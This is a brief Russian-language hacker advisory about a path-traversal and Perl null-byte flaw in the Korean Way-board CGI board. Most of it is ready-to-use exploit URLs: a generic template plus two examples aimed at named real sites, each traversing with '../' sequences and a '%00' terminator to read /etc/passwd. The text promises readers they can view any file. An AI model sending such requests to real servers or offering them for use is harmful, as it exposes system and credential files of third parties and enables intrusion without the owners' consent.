-----------UkR security team advisory ------------
Название: Уязвимость "show file", связанная с перловским багом null bite.
Проблема: Way-board - Это популярная корейская борда (http://way.co.kr - официальный сайт). С помощью этого бага вы сможете просматривать любые файлы, баг работает на любой системе,где perl установлен."%00" - символ конца строки, используемый в C, C++ и perl
Использование:
http://www.victim.com/way-board/way-board.cgi?db=урл_до_любого_файла
Пример:
http://www.kuwu.or.kr/way-board/way-board.cgi?db=../../../../../../../../etc/passwd%00
http://hanbando.net/way-board/way-board.cgi?db=../../../../../../../../etc/passwd%00
Автор: UKR-XblP
